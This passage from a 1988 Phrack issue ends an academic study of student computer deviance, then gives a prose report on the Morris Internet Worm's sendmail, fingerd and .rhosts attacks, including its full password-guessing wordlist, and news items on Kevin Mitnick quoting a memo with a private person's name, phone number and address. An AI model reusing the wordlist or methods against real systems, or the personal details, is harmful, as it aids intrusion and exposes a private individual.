  3106. criminal statue prohibiting unauthorized computer access, both malicious and
  3107. non-malicious (BloomBecker, 1986; Scott, 1984; U.S. Public Law 98-4733, 1984;
  3108. U.S. Public Law 99-474, 1986).  Although some computer deviance might already
  3109. have been illegal under fraud or other statutes, such rapid criminalization of
  3110. this form of deviant behavior is itself an interesting social phenomenon.
  3111.  
  3112. Parker documented thousands of computer-related incidents (1976; 1979; 1980a;
  3113. 1980b; and 1983), arguing that most documented cases of computer abuse were
  3114. discovered by accident.  He believed that these incidents represent the tip of
  3115. the iceberg.  Others counter that many of these so-called computer crimes are
  3116. apocryphal or not uniquely perpetrated by computer (Taber, 1980; Time, 1986).
  3117.  
  3118. Parker's work (1976; 1983) suggests that computer offenders are typically males
  3119. in the mid-twenties and thirties, acting illegally in their jobs, but others
  3120. may be high school and college students (New York Times, 1984b; see related
  3121. points in Hafner, 1983; Shea, 1984; New York Times, 1984a).
  3122.  
  3123. Levy (1984) and Landreth (1985) both note that some computer aficionados have
  3124. developed a "hacker ethic" allowing harmless computer exploration, including
  3125. free access to files belonging to other users, bypassing passwords and security
  3126. systems, outwitting bureaucrats preventing access, and opposing private
  3127. software and copy protection schemes.
  3128.  
  3129. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3130.  
  3131. This research on computer hackers is based on a small number of semi-structured
  3132. two-hour interviews covering many topics, including ties to other users,
  3133. computer ethics, knowledge of computer crime statutes, and self-reports of
  3134. using computers in an illegal fashion.
  3135.  
  3136. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3137.  
  3138. Such acts include these ten:
  3139. 1.  Acquiring another user's password.
  3140. 2.  Unauthorized use of someone else's computer account.
  3141. 3.  Unauthorized "browsing" among other user's computer files.
  3142. 4.  Unauthorized "copying" of another user's computer files.
  3143. 5.  Unauthorized file modification.
  3144. 6.  Deliberate sabotage of another user's programs.
  3145. 7.  Deliberately "crashing" a computer system.
  3146. 8.  Deliberate damage or theft of computer hardware.
  3147. 9.  Making an unauthorized or "pirated" copy of proprietary computer software
  3148.     for another user.
  3149. 10. Receiving an unauthorized or "pirated" copy of proprietary computer
  3150.     software from another user.
  3151.  
  3152. In 1985, a group of five students took unauthorized control of the account
  3153. management system on one of the University of Florida's Digital VAX computers.
  3154. They were able to allocate new accounts to each other and their friends.  In
  3155. addition, they browsed through other users' accounts, files and programs, and
  3156. most importantly, they modified or damaged a couple of files and programs on
  3157. the system.  All first-time offenders, three of the five performed "community
  3158. service" in consenting to being interviewed for this paper.  Eight additional
  3159. interviews were conducted with students selected randomly from an computer
  3160. science "assembler" (advanced machine language) class.  These students are
  3161. required to have a working knowledge of both mainframe systems and micro
  3162. computers, in addition to literacy in at least two other computer languages.
  3163.  
  3164. The State Attorney's decision not to prosecute these non-malicious offenders
  3165. under Florida's Computer Crime Act (Chapter 815) may reflect a more general
  3166. trend.  From research on the use (actually non-use) of computer crime statutes
  3167. nationally, both BloomBecker (1986) and Pfuhl (1987) report that given the lack
  3168. of a previous criminal record and the generally "prankish" nature of the vast
  3169. majority of these "crimes," very few offenders are being prosecuted with these
  3170. new laws.
  3171.  
  3172. The three known offenders differed little from four of the eight computer
  3173. science students in their level of self-reported computer deviance.  The
  3174. interviews suggest that computer deviance follows a Guttman-like progression of
  3175. involvement.  Four of the eight computer science respondents (including all
  3176. three females) reported no significant deviant activity using the computer.
  3177. They indicated no unauthorized browsing or file modification and only isolated
  3178. trading of "pirated" proprietary software.  When asked, none of these
  3179. respondents considered themselves "hackers."  However, two of the eight
  3180. computer science students admitted to being very active in unauthorized use.
  3181.  
  3182. Respondents who admitted to violations seem to fit into three categories.
  3183. PIRATES reported mainly copyright infringements, such as giving or receiving
  3184. illegally copied versions of popular software programs.  In fact, pirating
  3185. software was the most common form of computer deviance discovered, with
  3186. slightly over half of the respondents indicating some level of involvement.  In
  3187. addition to software piracy, BROWSERS gained occasional unauthorized access to
  3188. another user's university computer account and browsed the private files of
  3189. others.  However, they did not damage or copy these files.  CRACKERS were most
  3190. serious abusers.  These five individuals admitted many separate instances of
  3191. the other two types of computer deviance, but went beyond that.  They reported
  3192. copying, modifying, and sabotaging other user's computer files and programs.
  3193. These respondents also reported "crashing" entire computer systems or trying to
  3194. do so.
  3195.  
  3196. Whether for normative or technical reaspons, at least in this small sample,
  3197. involvement in computer crime seems to follow a Guttman-like progression.
  3198.  
  3199. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3200.  
  3201.                                   REFERENCES
  3202.  
  3203. BloomBecker, Jay.  1986.  Computer Crime Law Reporter:  1986 Update.  Los
  3204.      Angeles:  National Center for Computer Crime Data.
  3205. Florida, State of.  1978.  Florida Computer Crimes Act Chapter 815.01-815.08.
  3206. Hafner, Katherine.  1983.  "UCLA student penetrates DOD Network," InfoWorld
  3207.      5(47):  28.
  3208. Landreth, Bill. 1985.  Out of the Inner Circle:  A Hacker's Guide to Computer
  3209.      Security.  Bellevue, Washington:  Microsoft Press.
  3210. Levy, Steven.  1984.  Hackers:  Heroes of the Computer Revolution.  New York:
  3211.      Doubleday.
  3212. Miami Herald.  1977a-.  "Dog players bilked via computer,"  (September
  3213.      20):1,16.
  3214. --1977b "Why Flagler Dog Track was easy pickings," (September 21):  1,17.
  3215. Newsweek.  1983a.  "Beware:  Hackers at play," (September 5):  42-46,48.
  3216. --1983b.  "Preventing 'WarGames'," (September 5):  48.
  3217. New York Times.  1984a.  "Low Tech" (January 5):  26.
  3218. --1984b.  "Two who raided computers pleading guilty," (March 17):  6.
  3219. Parker, Donn B.  1976.  Crime By Computer.  New York:  Charles Scribner's Sons.
  3220. --1979.  Computer Crime:  Criminal Justice Resource Manual.  Washington, D.C.:
  3221.      U.S. Government Printing Office.
  3222. --1980a.  "Computer abuse research update," Computer/Law Journal 2:  329-52.
  3223. --1980b.  "Computer-related white collar crime," In Gilbert Geis and Ezra
  3224.      Stotland (eds.), White Collar Crime:  Theory and Research.  Beverly Hills,
  3225.      CA.:  Sage, pp.  199-220.
  3226. --1983.  Fighting Computer Crime.  New York:  Charles Scribner's Sons.
  3227. Pful, Erdwin H.  1987.  "Computer abuse:  problems of instrumental control.
  3228.      Deviant Behavior 8:  113-130.
  3229. Scott, Michael D.  1984.  Computer Law.  New York:  John Wiley and Sons.
  3230. Shea, Tom.  1984.  "The FBI goes after hackers," Infoworld 6 (13):
  3231.      38,39,41,43,44.
  3232. Taber, John K.  1980.  "A survey of computer crime studies," Computer/Law
  3233.      Journal 2:  275-327.
  3234. Time.  1983a.  "Playing games," (August 22):  14.
  3235. --1983b.  "The 414 gang strikes again," (August 29):  75.
  3236. --1986.  "Surveying the data diddlers," (February 17):  95.
  3237. Underwood, John.  1979.  "Win, place...  and sting," Sports Illustrated 51
  3238.      (July 23):  54-81+.
  3239. U.S. Public Law 98-473.  1984.  Counterfeit Access Device and Computer Fraud
  3240.      and Abuse Act of 1984.  Amendment to Chapter 47 of Title 18 of the United
  3241.      States Code, (October 12).
  3242. U.S. Public Law 99-474.  1986.  Computer Fraud and Abuse Act of 1986.
  3243.      Amendment to Chapter 47 of Title 18 of the United States Code, (October
  3244.      16).
  3245. _______________________________________________________________________________
  3246. =========================================================================
  3247.  
  3248.                                 ==Phrack Inc.==
  3249.  
  3250.                       Volume Two, Issue 22, File 8 of 12
  3251.  
  3252.             "]}`"`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
  3253.             \`\`\                                             \`\`\
  3254.             \`\          A Report On The InterNet Worm          \`\
  3255.             \`\                                                 \`\
  3256.             \`\                   By Bob Page                   \`\
  3257.             \`\                                                 \`\
  3258.             \`\              University of Lowell               \`\
  3259.             \`\           Computer Science Department           \`\
  3260.             \`\                                                 \`\
  3261.             \`\                November 7, 1988                 \`\
  3262.             \`\`\                                             \`\`\
  3263.             \`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\`\
  3264.  
  3265.  
  3266. Here's the truth about the "Internet Worm."  Actually it's not a virus -
  3267. a virus is a piece of code that adds itself to other programs, including
  3268. operating systems.  It cannot run independently, but rather requires that its
  3269. "host" program be run to activate it.  As such, it has a clear analog to
  3270. biologic viruses -- those viruses are not considered live, but they invade host
  3271. cells and take them over, making them produce new viruses.
  3272.  
  3273. A worm is a program that can run by itself and can propagate a fully working
  3274. version of itself to other machines.  As such, what was loosed on the Internet
  3275. was clearly a worm.
  3276.  
  3277. This data was collected through an emergency mailing list set up by Gene
  3278. Spafford at Purdue University, for administrators of major Internet sites -
  3279. some of the text is included verbatim from that list.
  3280.  
  3281. The basic object of the worm is to get a shell on another machine so it can
  3282. reproduce further.  There are three ways it attacks: sendmail, fingerd, and
  3283. rsh/rexec.
  3284.  
  3285. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3286.  
  3287. The Sendmail Attack:
  3288.  
  3289. In the sendmail attack, the worm opens a TCP connection to another machine's
  3290. sendmail (the SMTP port), invokes debug mode, and sends a RCPT TO that requests
  3291. its data be piped through a shell.  That data, a shell script (first-stage
  3292. bootstrap) creates a temporary second-stage bootstrap file called x$$,l1.c
  3293. (where '$$' is the current process ID).  This is a small (40-line) C program.
  3294.  
  3295. The first-stage bootstrap compiles this program with the local cc and executes
  3296. it with arguments giving the Internet hostid/socket/password of where it just
  3297. came from.  The second-stage bootstrap (the compiled C program) sucks over two
  3298. object files, x$$,vax.o and x$$,sun3.o from the attacking host.  It has an
  3299. array for 20 file names (presumably for 20 different machines), but only two
  3300. (vax and sun) were compiled in to this code.  It then figures out whether it's
  3301. running under BSD or SunOS and links the appropriate file against the C library
  3302. to produce an executable program called /usr/tmp/sh - so it looks like the
  3303. Bourne shell to anyone who looked there.
  3304.  
  3305.  
  3306. The Fingerd Attack:
  3307.  
  3308. In the fingerd attack, it tries to infiltrate systems via a bug in fingerd, the
  3309. finger daemon.  Apparently this is where most of its success was (not in
  3310. sendmail, as was originally reported).  When fingerd is connected to, it reads
  3311. its arguments from a pipe, but doesn't limit how much it reads.  If it reads
  3312. more than the internal 512-byte buffer allowed, it writes past the end of its
  3313. stack.  After the stack is a command to be executed ("/usr/ucb/finger") that
  3314. actually does the work.  On a VAX, the worm knew how much further from the
  3315. stack it had to clobber to get to this command, which it replaced with the
  3316. command "/bin/sh" (the bourne shell).  So instead of the finger command being
  3317. executed, a shell was started with no arguments.  Since this is run in the
  3318. context of the finger daemon, stdin and stdout are connected to the network
  3319. socket, and all the files were sucked over just like the shell that sendmail
  3320. provided.
  3321.  
  3322.  
  3323. The Rsh/Rexec Attack:
  3324.  
  3325. The third way it tried to get into systems was via the .rhosts and
  3326. /etc/hosts.equiv files to determine 'trusted' hosts where it might be able to
  3327. migrate to.  To use the .rhosts feature, it needed to actually get into
  3328. people's accounts - since the worm was not running as root (it was running as
  3329. daemon) it had to figure out people's passwords.  To do this, it went through
  3330. the /etc/passwd file, trying to guess passwords.  It tried combinations of: the
  3331. username, the last, first, last+first, nick names (from the GECOS field), and a
  3332. list of special "popular" passwords:
  3333.  
  3334. aaa             cornelius    guntis      noxious       simon
  3335. academia        couscous     hacker      nutrition     simple
  3336. aerobics        creation     hamlet      nyquist       singer
  3337. airplane        creosote     handily     oceanography  single
  3338. albany          cretin       happening   ocelot        smile
  3339. albatross       daemon       harmony     olivetti      smiles
  3340. albert          dancer       harold      olivia        smooch
  3341. alex            daniel       harvey      oracle        smother
  3342. alexander       danny        hebrides    orca          snatch
  3343. algebra         dave         heinlein    orwell        snoopy
  3344. aliases         december     hello       osiris        soap
  3345. alphabet        defoe        help        outlaw        socrates
  3346. ama             deluge       herbert     oxford        sossina
  3347. amorphous       desperate    hiawatha    pacific       sparrows
  3348. analog          develop      hibernia    painless      spit
  3349. anchor          dieter       honey       pakistan      spring
  3350. andromache      digital      horse       pam           springer
  3351. animals         discovery    horus       papers        squires
  3352. answer          disney       hutchins    password      strangle
  3353. anthropogenic   dog          imbroglio   patricia      stratford
  3354. anvils          drought      imperial    penguin       stuttgart
  3355. anything        duncan       include     peoria        subway
  3356. aria            eager        ingres      percolate     success
  3357. ariadne         easier       inna        persimmon     summer
  3358. arrow           edges        innocuous   persona       super
  3359. arthur          edinburgh    irishman    pete          superstage
  3360. athena          edwin        isis        peter         support
  3361. atmosphere      edwina       japan       philip        supported
  3362. aztecs          egghead      jessica     phoenix       surfer
  3363. azure           eiderdown    jester      pierre        suzanne
  3364. bacchus         eileen       jixian      pizza         swearer
  3365. bailey          einstein     johnny      plover        symmetry
  3366. banana          elephant     joseph      plymouth      tangerine
  3367. bananas         elizabeth    joshua      polynomial    tape
  3368. bandit          ellen        judith      pondering     target
  3369. banks           emerald      juggle      pork          tarragon
  3370. barber          engine       julia       poster        taylor
  3371. baritone        engineer     kathleen    praise        telephone
  3372. bass            enterprise   kermit      precious      temptation
  3373. bassoon         enzyme       kernel      prelude       thailand
  3374. batman          ersatz       kirkland    prince        tiger
  3375. beater          establish    knight      princeton     toggle
  3376. beauty          estate       ladle       protect       tomato
  3377. beethoven       euclid       lambda      protozoa      topography
  3378. beloved         evelyn       lamination  pumpkin       tortoise
  3379. benz            extension    larkin      puneet        toyota
  3380. beowulf         fairway      larry       puppet        trails
  3381. berkeley        felicia      lazarus     rabbit        trivial
  3382. berliner        fender       lebesgue    rachmaninoff  trombone
  3383. beryl           fermat       lee         rainbow       tubas
  3384. beverly         fidelity     leland      raindrop      tuttle
  3385. bicameral       finite       leroy       raleigh       umesh
  3386. bob             fishers      lewis       random        unhappy
  3387. brenda          flakes       light       rascal        unicorn
  3388. brian           float        lisa        really        unknown
  3389. bridget         flower       louis       rebecca       urchin
  3390. broadway        flowers      lynne       remote        utility
  3391. bumbling        foolproof    macintosh   rick          vasant
  3392. burgess         football     mack        ripple        vertigo
  3393. campanile       foresight    maggot      robotics      vicky
  3394. cantor          format       magic       rochester     village
  3395. cardinal        forsythe     malcolm     rolex         virginia
  3396. carmen          fourier      mark        romano        warren
  3397. carolina        fred         markus      ronald        water
  3398. caroline        friend       marty       rosebud       weenie
  3399. cascades        frighten     marvin      rosemary      whatnot
  3400. castle          fun          master      roses         whiting
  3401. cat             fungible     maurice     ruben         whitney
  3402. cayuga          gabriel      mellon      rules         will
  3403. celtics         gardner      merlin      ruth          william
  3404. cerulean        garfield     mets        sal           williamsburg
  3405. change          gauss        michael     saxon         willie
  3406. charles         george       michelle    scamper       winston
  3407. charming        gertrude     mike        scheme        wisconsin
  3408. charon          ginger       minimum     scott         wizard
  3409. chester         glacier      minsky      scotty        wombat
  3410. cigar           gnu          moguls      secret        woodwind
  3411. classic         golfer       moose       sensor        wormwood
  3412. clusters        gorgeous     morley      serenity      yaco
  3413. coffee          gorges       mozart      sharks        yang
  3414. coke            gosling      nancy       sharon        yellowstone
  3415. collins         gouge        napoleon    sheffield     yosemite
  3416. commrades       graham       nepenthe    sheldon       zap
  3417. computer        gryphon      ness        shiva         zimmerman
  3418. condo           guest        network     shivers
  3419. cookie          guitar       newton      shuttle
  3420. cooper          gumption     next        signature
  3421.  
  3422.  
  3423. When everything else fails, it opens /usr/dict/words and tries every word in
  3424. the dictionary.  It is pretty successful in finding passwords, as most people
  3425. don't choose them very well.  Once it gets into someone's account, it looks for
  3426. a .rhosts file and does an 'rsh' and/or 'rexec' to another host, it sucks over
  3427. the necessary files into /usr/tmp and runs /usr/tmp/sh to start all over again.
  3428.  
  3429. Between these three methods of attack (sendmail, fingerd, .rhosts) it was able
  3430. to spread very quickly.
  3431.  
  3432.  
  3433. The Worm Itself:
  3434.  
  3435. The 'sh' program is the actual worm.  When it starts up it clobbers its argv
  3436. array so a 'ps' will not show its name.  It opens all its necessary files, then
  3437. unlinks (deletes) them so they can't be found (since it has them open, however,
  3438. it can still access the contents).  It then tries to infect as many other hosts
  3439. as possible - when it sucessfully connects to one host, it forks a child to
  3440. continue the infection while the parent keeps on trying new hosts.
  3441.  
  3442. One of the things it does before it attacks a host is connect to the telnet
  3443. port and immediately close it.  Thus, "telnetd: ttloop: peer died" in
  3444. /usr/adm/messages means the worm attempted an attack.
  3445.  
  3446. The worm's role in life is to reproduce - nothing more.  To do that it needs to
  3447. find other hosts.  It does a 'netstat -r -n' to find local routes to other
  3448. hosts & networks, looks in /etc/hosts, and uses the yellow pages distributed
  3449. hosts file if it's available.  Any time it finds a host, it tries to infect it
  3450. through one of the three methods, see above.  Once it finds a local network
  3451. (like 129.63.nn.nn for ulowell) it sequentially tries every address in that
  3452. range.
  3453.  
  3454. If the system crashes or is rebooted, most system boot procedures clear /tmp
  3455. and /usr/tmp as a matter of course, erasing any evidence.  However, sendmail
  3456. log files show mail coming in from user /dev/null for user /bin/sed, which is a
  3457. tipoff that the worm entered.
  3458.  
  3459. Each time the worm is started, there is a 1/15 chance (it calls random()) that
  3460. it sends a single byte to ernie.berkeley.edu on some magic port, apparently to
  3461. act as some kind of monitoring mechanism.
  3462.  
  3463.  
  3464. The Crackdown:
  3465.  
  3466. Three main 'swat' teams from Berkeley, MIT and Purdue found copies of the VAX
  3467. code (the .o files had all the symbols intact with somewhat meaningful names)
  3468. and disassembled it into about 3000 lines of C.  The BSD development team poked
  3469. fun at the code, even going so far to point out bugs in the code and supplying
  3470. source patches for it!  They have not released the actual source code, however,
  3471. and refuse to do so.  That could change - there are a number of people who want
  3472. to see the code.
  3473.  
  3474. Portions of the code appear incomplete, as if the program development was not
  3475. yet finished.  For example, it knows the offset needed to break the BSD
  3476. fingerd, but doesn't know the correct offset for Sun's fingerd (which causes it
  3477. to dump core); it also doesn't erase its tracks as cleverly as it might; and so
  3478. on.
  3479.  
  3480. The worm uses a variable called 'pleasequit' but doesn't correctly initialize
  3481. it, so some folks added a module called _worm.o to the C library, which is
  3482. produced from:  int pleasequit = -1; the fact that this value is set to -1 will
  3483. cause it to exit after one iteration.
  3484.  
  3485. The close scrutiny of the code also turned up comments on the programmer's
  3486. style.  Verbatim from someone at MIT:
  3487.  
  3488.     From disassembling the code, it looks like the programmer is really
  3489.     anally retentive about checking return codes, and, in addition,
  3490.     prefers to use array indexing instead of pointers to walk through
  3491.     arrays.
  3492.  
  3493. Anyone who looks at the binary will not see any embedded strings - they are
  3494. XOR'ed with 81 (hex).  That's how the shell commands are imbedded.  The
  3495. "obvious" passwords are stored with their high bit set.
  3496.  
  3497. Although it spreads very fast, it is somewhat slowed down by the fact that it
  3498. drives the load average up on the machine - this is due to all the encryptions
  3499. going on, and the large number of incoming worms from other machines.
  3500.  
  3501. [Initially, the fastest defense against the worm is is to create a directory
  3502. called /usr/tmp/sh.  The script that creates /usr/tmp/sh from one of the .o
  3503. files checks to see if /usr/tmp/sh exists, but not to see if it's a directory.
  3504. This fix is known as 'the condom'.]
  3505.  
  3506.  
  3507. Now What?
  3508.  
  3509. Most Internet systems running 4.3BSD or SunOS have installed the necessary
  3510. patches to close the holes and have rejoined the Internet.  As you would
  3511. expect, there is a renewed interest in system/network security, finding and
  3512. plugging holes, and speculation over what will happen to the worm's creator.
  3513.  
  3514. If you haven't read or watched the news, various log files have named
  3515. the responsible person as Robert Morris Jr., a 23-year old doctoral student at
  3516. Cornell.  His father is head of the National Computer Security Center, the
  3517. NSA's public effort in computer security, and has lectured widely on security
  3518. aspects of UNIX.
  3519.  
  3520. Associates of the student claim the worm was a 'mistake' - that he intended to
  3521. unleash it but it was not supposed to move so quickly or spread so much.  His
  3522. goal was to have a program 'live' within the Internet.  If the reports that he
  3523. intended it to spread slowly are true, then it's possible that the bytes sent
  3524. to ernie.berkeley.edu were intended to monitor the spread of the worm.  Some
  3525. news reports mentioned that he panicked when, via some "monitoring mechanism"
  3526. he saw how fast it had propagated.
  3527.  
  3528. A source inside DEC reports that although the worm didn't make much progress
  3529. there, it was sighted on several machines that wouldn't be on its normal
  3530. propagation path, i.e. not gateways and not on the same subnet.  These machines
  3531. are not reachable from the outside.  Morris was a summer intern at DEC in '87.
  3532. He might have included names or addresses he remembered as targets for
  3533. infesting hidden internal networks.  Most of the DEC machines in question
  3534. belong to the group he worked in.
  3535.  
  3536. The final word has not been written...
  3537.                                  ...it will be interesting to see what happens.
  3538. _______________________________________________________________________________
  3539. =========================================================================
  3540.  
  3541.                                 ==Phrack Inc.==
  3542.  
  3543.                       Volume Two, Issue 22, File 9 of 12
  3544.  
  3545.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3546.             PWN                                                 PWN
  3547.             PWN        P h r a c k   W o r l d   N e w s        PWN
  3548.             PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
  3549.             PWN                Issue XXII/Part 1                PWN
  3550.             PWN                                                 PWN
  3551.             PWN           Created by Knight Lightning           PWN
  3552.             PWN                                                 PWN
  3553.             PWN              Written and Edited by              PWN
  3554.             PWN         Knight Lightning and Taran King         PWN
  3555.             PWN                                                 PWN
  3556.             PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
  3557.  
  3558.  
  3559. What Is Wrong With This Issue?                                     Introduction
  3560. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3561. There is a distinct difference in this issue of Phrack World News, which may be
  3562. attributed to the unfortunate final outcome of my self-enforced exile from the
  3563. mainstream modem community.  In the "prime" days of PWN, many of you may have
  3564. enjoyed the numerous "bust" stories or the ever suspenseful undercover
  3565. exposures of security trying to end the hacking community.  Those days are over
  3566. and have been for quite some time.
  3567.  
  3568. To put it simply, I do not have the economic resources to legally run around on
  3569. the nation's bulletin boards or to go and gather information on suspected
  3570. security agents.  Perhaps this is for the better.  However, I have a feeling
  3571. that most people disagree and rather enjoyed those types of stories.  Its no
  3572. longer in my hands.  Its obvious that I need help with such a task and that
  3573. help can only come from you, the community itself.
  3574.  
  3575. I am easily reached... I am on Bitnet.  Even people who own MCI Mail, GTE
  3576. Telemail, or Compuserve accounts can send me mail thanks to experimental
  3577. gateways.  People on ARPAnet, Bitnet, or UUCP should have no problems
  3578. whatsoever.  So please go ahead and drop me a line, I would be interested in
  3579. what you have to say.
  3580.  
  3581. :Knight Lightning (C483307@UMCVMB.BITNET)
  3582.  
  3583. Much of this issue of Phrack World News comes from Internet news sources such
  3584. as the Risks, Virus-L, and Telecom Digests.  Some news stories come from other
  3585. magazines and newspapers, and a few come from Chamas, the online Bitnet
  3586. bulletin board run by Terra of the Chaos Computer Club (CCC).  A very special
  3587. thanks goes to The Noid of 314 for all his help in putting this issue together.
  3588.  
  3589. A couple last things to mention... the upcoming files on hackers abroad have
  3590. taken a slightly different direction.  There will be news on foreign hacker
  3591. activities presented in PWN (starting this issue), but actual files on the
  3592. subject will be presented by the hackers themselves so watch for them.
  3593. _______________________________________________________________________________
  3594.  
  3595. Who Is Clifford Stoll?                                    Pre-Issue Information
  3596. ~~~~~~~~~~~~~~~~~~~~~~
  3597. This issue of Phrack World News features many stories about the Internet Worm
  3598. and other hacking incidents on the Internet.  One person who plays a prominent
  3599. role in all of these stories is Clifford Stoll, a virtual unknown prior to
  3600. these incidents.  However, some checking into other related incidents turned up
  3601. some very interesting information about Cliff Stoll.
  3602.  
  3603. Clifford Stoll, age 37 (as of May 2, 1988) was a system's manager at
  3604. California's Lawrence Berkeley Laboratory.  He might still retain this
  3605. position.  Stoll is the master sleuth who tracked down the West German hacker,
  3606. Mathias Speer, who infiltrated the Internet via the Space Physics Analysis
  3607. Network (SPAN).  The game of "cat and mouse" lasted for 10 months until
  3608. Clifford Stoll eventually set up an elaborate sting operation using files
  3609. marked "SDI Network Project" (Star Wars) to get Mathias to stay online long
  3610. enough to trace him back to Hannover, FRG.
  3611.  
  3612. I was able to contact Clifford Stoll at LBL (which maintains a node on Bitnet).
  3613. However, outside of a confirmation of his presence, I was never able to really
  3614. converse with him.  Recently he has been seen on DOCKMASTER, a node on ARPAnet
  3615. that is operated by the National Security Agency (NSA).  He has also been seen
  3616. as having accounts on many other nodes all across Internet.  Either he has come
  3617. a long way or was just not as well known prior to the Internet Worm incident.
  3618.  
  3619. For more information see;
  3620.  
  3621.         Time Magazine, May 2, 1988 and/or New Scientist, April 28, 1988
  3622.         -------------                     -------------
  3623. Thought you might be interested to know about it.
  3624.  
  3625. :Knight Lightning
  3626. _______________________________________________________________________________
  3627.  
  3628. Dangerous Hacker Is Captured                                 PWN Special Report
  3629. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3630. Last issue, I re-presented some memos from Pacific Bell Security.  The first
  3631. of which featured "Kevin Hacker," who I now reveal as Kevin Mitnick.  The
  3632. original intent was to protect the anonyimity of the said hacker, but now that
  3633. he has come upon public fame there is no longer a reason to keep his identity a
  3634. secret.
  3635.  
  3636. The following memo from Pacific Bell Security was originally seen in Phrack
  3637. World News Issue XXI/1.  This version leaves the legitimate information intact.
  3638.  
  3639. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3640.  
  3641. On May 14, 1987, Electronic Operations received a court order directing Pacific
  3642. Bell to place traps on the telephone numbers assigned to a company known as
  3643. "Santa Cruz Operations."  The court order was issued in order to identify the
  3644. telephone number being used by an individual who was illegally entering Santa
  3645. Cruz Operations' computer and stealing information.
  3646.  
  3647. On May 28, 1987, a telephone number was identified five separate times making
  3648. illegal entry into Santa Cruz Operations' computer.  The originating telephone
  3649. number was 805-495-6191, which is listed to Bonnie Vitello, 1378 E. Hillcrest
  3650. Drive, Apt. 404, Thousand Oaks, California.
  3651.  
  3652. On June 3, 1987, a search warrant was served at 1378 E. Hillcrest Drive, Apt
  3653. 404, Thousand Oaks, California.  The residents of the apartment, who were not
  3654. at home, were identified as Bonnie Vitello, a programmer for General Telephone,
  3655. and Kevin Mitnick, a known computer hacker.  Found inside the apartment were
  3656. three computers, numerous floppy disks and a number of General Telephone
  3657. computer manuals.
  3658.  
  3659. Kevin Mitnick was arrested several years ago for hacking Pacific Bell, UCLA and
  3660. Hughes Aircraft Company computers.  Mitnick was a minor at the time of his
  3661. arrest.  Kevin Mitnick was recently arrested for compromising the data base of
  3662. Santa Cruz Operations.
  3663.  
  3664. The floppy disks that were seized pursuant to the search warrant revealed
  3665. Mitnick's involvment in compromising the Pacific Bell UNIX operation systems
  3666. and other data bases.  The disks documented the following:
  3667.  
  3668.   o  Mitnick's compromise of all Southern California SCC/ESAC computers.  On
  3669.      file were the names, log-ins, passwords, and home telephone numbers for
  3670.      Northern and Southern ESAC employees.
  3671.  
  3672.   o  The dial-up numbers and circuit identification documents for SCC computers
  3673.      and Data Kits.
  3674.  
  3675.   o  The commands for testing and seizing trunk testing lines and channels.
  3676.  
  3677.   o  The commands and log-ins for COSMOS wire centers for Northern and Southern
  3678.      California.
  3679.  
  3680.   o  The commands for line monitoring and the seizure of dial tone.
  3681.  
  3682.   o  References to the impersonation of Southern California Security Agents and
  3683.      ESAC employees to obtain information.
  3684.  
  3685.   o  The commands for placing terminating and originating traps.
  3686.  
  3687.   o  The addresses of Pacific Bell locations and the Electronic Door Lock
  3688.      access codes for the following Southern California central offices ELSG12,
  3689.      LSAN06, LSAN12, LSAN15, LSAN23, LSAN56, AVLN11, HLWD01, HWTH01, IGWD01,
  3690.      LOMT11, AND SNPD01.
  3691.  
  3692.   o  Inter-company Electronic Mail detailing new login/password procedures and
  3693.      safeguards.
  3694.  
  3695.   o  The work sheet of an UNIX encryption reader hacker file.  If successful,
  3696.      this program could break into any UNIX system at will.
  3697.  
  3698. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  3699.  
  3700. Ex-Computer Whiz Kid Held On New Fraud Counts                 December 16, 1988
  3701. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  3702. By Kim Murphy (Los Angeles Times)(Edited For This Presentation)
  3703.  
  3704. Kevin Mitnick was 17 when he first cracked Pacific Bell's computer system,
  3705. secretly channeling his computer through a pay phone to alter telephone bills,
  3706. penetrate other computers and steal $200,000 worth of data from a San Francisco
  3707. corporation.  A Juvenile Court judge at the time sentenced Mitnick to six
  3708. months in a youth facility.
  3709.  
  3710. After his release, his probation officer found that her phone had been
  3711. disconnected and the phone company had no record of it.  A judge's credit
  3712. record at TRW Inc. was inexplicably altered.  Police computer files on the case
  3713. were accessed from outside... Mitnick fled to Israel.  Upon his return, there
  3714. were new charges filed in Santa Cruz, accusing Mitnick of stealing software
  3715. under development by Microport Systems, and federal prosecutors have a judgment
  3716. showing Mitnick was convicted on the charge.  There is, however, no record of
  3717. the conviction in Sant Cruz's computer files.
  3718.  
  3719. On Thursday, Mitnick, now 25, was charged in two new criminal complaints
  3720. accusing him of causing $4 million damage to a DEC computer, stealing a highly
  3721. secret computer security system and gaining access to unauthorized MCI
  3722. long-distance codes through university computers in Los Angeles, California,
  3723. and England.
  3724.  
  3725. A United States Magistrate took the unusual step of ordering "Mitnic    k] held
  3726. without bail, ruling that when armed with a keyboard he posed a danger to the
  3727. community.' "This thing is so massive, we're just running around trying to
  3728. figure out what he did," said the prosecutor, an Assistant United States
  3729. Attorney.  "This person, we believe, is very, very dangerous, and he needs to
  3730. be detained and kept away from a computer."
  3731.  
  3732. Los Angeles Police Department and FBI Investigators say they are only now
  3733. beginning to put together a picture of Mitnick and his alleged high-tech
  3734. escapades.  "He's several levels above what you would characterize as a
  3735. computer hacker," said Detective James K. Black, head of the Los Angeles Police
  3736. Department's computer crime unit.  "He started out with a real driving
  3737. curiosity for computers that went beyond personal computers... He grew with the
  3738. technology."
  3739.  
  3740. Mitnick is to be arraigned on two counts of computer fraud.  The case is
  3741. believed to be the first in the nation under a federal law that makes it a
  3742. crime to gain access to an interstate computer network for criminal purposes.
  3743. Federal prosecutors also obtained a court order restricting Mitnick's telephone
